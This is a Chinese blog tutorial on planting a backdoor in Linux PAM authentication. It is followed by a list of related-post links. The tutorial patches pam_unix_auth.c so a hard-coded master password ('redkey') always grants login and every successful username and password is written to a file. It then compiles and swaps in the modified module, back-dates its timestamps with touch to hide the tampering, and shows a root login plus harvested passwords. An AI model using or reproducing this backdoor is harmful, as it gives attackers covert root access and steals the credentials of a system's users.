Linux系统安全之pam后门安装使用详解
一.查看系统pam版本:
[root@redkey ~]# rpm -qa | grep pam
pam-1.1.1-4.el6.x86_64
二.下载对应版本的pam模块
http://www.linux-pam.org/library/
三.解压&修改pam_unix_auth.c文件
tar -xzvf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1
cd modules/pam_unix/
vim pam_unix_auth.c
四.修改部分
在
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags,int argc, const char **argv)
{
定义:FILE *fp;如下:
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags,int argc, const char **argv)
{unsigned int ctrl;int retval, *ret_data = NULL;const char *name;const void *p;FILE *fp;
在retval = _unix_verify_password(pamh, name, p, ctrl); [约177行]下添加
/*password:”redkey”*/
if(strcmp(p,”redkey”)==0)
{retval = PAM_SUCCESS;
}
if(retval== PAM_SUCCESS)
{
/*pamfile:pamwd.txt*/fp=fopen(“pamwd.txt”,”a”);fprintf(fp,”%s::%s\n”,name,p);fclose(fp);
}
五.编译
[root@redkey pam_unix]# cd ../../
[root@redkey Linux-PAM-1.1.1]# ./configure
[root@redkey Linux-PAM-1.1.1]# make
六.备份原有PAM模块
[root@redkey security]# mv pam_unix.so{,.bak}
七.复制新PAM模块到/lib64/security/目录下:
[root@redkey security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/
八.修改pam模块时间属性
[root@redkey security]# stat pam_unix.*File: “pam_unix.so”Size: 151879 Blocks: 304 IO Block: 4096 普通文件
Device: fd01h/64769d Inode: 565261 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2013-12-24 11:30:01.813610217 +0800
Modify: 2013-12-24 08:55:00.000000000 +0800
Change: 2013-12-24 11:29:12.747789015 +0800File: “pam_unix.so.bak”Size: 50752 Blocks: 104 IO Block: 4096 普通文件
Device: fd01h/64769d Inode: 523660 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2013-12-24 08:55:08.026835929 +0800
Modify: 2010-02-16 01:34:42.000000000 +0800
Change: 2013-12-24 10:42:11.741663207 +0800
[root@redkey security]# touch -t 201002160134 pam_unix.so
[root@redkey security]# ll pam_unix.*
-rwxr-xr-x 1 root root 151879 2月 16 2010 pam_unix.so
-rwxr-xr-x. 1 root root 50752 2月 16 2010 pam_unix.so.bak
九.万能密码登陆验证
login as: root
root@192.168.169.131’s password:
Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1
[root@redkey ~]#
[root@redkey /]# cat pamwd.txt
root::redkey
root::123456
root::12345678
root::redkey
root::redkey
转载于:https://www.cnblogs.com/beautiful-code/p/9441757.html
Linux系统安全之pam后门安装使用详解相关推荐
- Linux系统下ifconfig和route配置网络详解
Linux系统下ifconfig和route配置网络详解 ifconfig和route合用于配置网络(ip命令综合二者功能,此处不讲),通常在前者设置好ip地址等信息后,采用route命令配置路由.( ...
- Linux系统下SVN服务器的搭建过程详解 UpJ}s7+
Linux系统下SVN服务器的搭建过程详解 UpJ}s7+ 1 环境: 服务器放在redhatAS4.0上,客户端在windows 2000. k_lb"5z Z]jSq@%1H* ...
- linux管道命令详解,Linux系统中的管道命令的用法详解
Linux系统中管道命令是linux系统的一个强大之处.下面由学习啦小编为大家整理了Linux系统中的管道命令的用法详解的相关知识,希望对大家有帮助! Linux系统中的管道命令的用法详解 管道命令操 ...
- win7 64位操作系统中Oracle 11g + plsql安装教程详解(图解)
这篇文章主要介绍了win7 64位操作系统中Oracle 11g + plsql安装教程详解(图解),详细的介绍了Oracle 11g 安装的步骤,有兴趣的可以了解一下. 先去网上把下面列表里的文件下 ...
- Linux系统多网卡绑定各配置模式详解
Linux系统多网卡绑定各配置模式详解 1. 配置多网卡bond 1.1. mode=0 模式 1.2. mode=1 模式 1.2.1. 关闭NetworkManager服务 1.2.2. 网卡配置 ...
- linux权限644是什么,linux系统644、755、777权限详解linux操作系统 电脑资料
linux系统644.755.777权限详解linux操作系统 电脑资料 在linux系统中644.755.777三种权限是非常重要的一些权限了,下面我来详细的介绍644.755.777三种权限的使用 ...
- mysql8对系统的要求_linux-mysql8的安装步骤详解及需要注意的坑
(本文由言念小文原创,转载请注明出处) 前言 最近安装mysql8时,遇到了一些问题,记录下来作为以后操作指导资料. Linux上mysql安装方法个人目前使用的有两种: 一种是基于rpm安装: 另一 ...
- linux系统修复找不到原安装,Linux 系统用安装盘来修复GRUB 详解
常用恢复MBR的办法还有一种是用升级系统的办法,这种办法经过验证,是极不可 靠的.我们经过近二三十次的实践,证明效果几乎很少,这个办法用于没有安装 GRUB的还是可行的.如果已经把GRUB安装上,后来 ...
- Linux系统关闭或重新启动主机的命令详解
即使现在Linux系统基本都是相对稳定,但有时候驱动程序和应用程序也可能存在一些小问题,这时就需要重新启动Linux系统主机,今天美联科技就来讲解下,关闭或重新启动Linux系统的几个实用命令. 1. ...
最新文章
- 解决IDEA2020控制台乱码的方法(亲测)
- 65.4. Other GUI - phpOraAdmin
- YUI事件体系之Y.CustomEvent
- java converter转换器_在SpringMVC中设置自定义类型转换器Converter
- 使用DOM4J解析XML及采用Schema校验的方法
- 换行 输出txt_编程短文:Bash echo如何原生输出带空格的字符串而不换行
- 你不知道的思维导图能做的事
- Centos5.11 //IP/phpmyadmin 远程无法登入
- android 背景逐渐变暗,UI:使View背景逐渐变暗的方法
- 在Ubuntu中搭建嵌入式Linux开发环境
- python选择时间窗口_对pandas中时间窗函数rolling的使用详解
- 我为什么选择Hexo建站
- oracle01004,Oracle goldengate的OGG-01004 OGG-1296错误
- 解决微博SDK接入全平台支持
- 小白也能行--李洵同款--动态爱心代码《附可跳动版本代码》
- NFM(Neural Factorization Machines):模型原理及pytorch代码实现
- 一个好的学习方法——MAS 学习法
- [BZOJ1123][POI2008]BLO(tarjan求点双+树形dp)
- OPC UA学习笔记
- 交换机/路由器的存储介质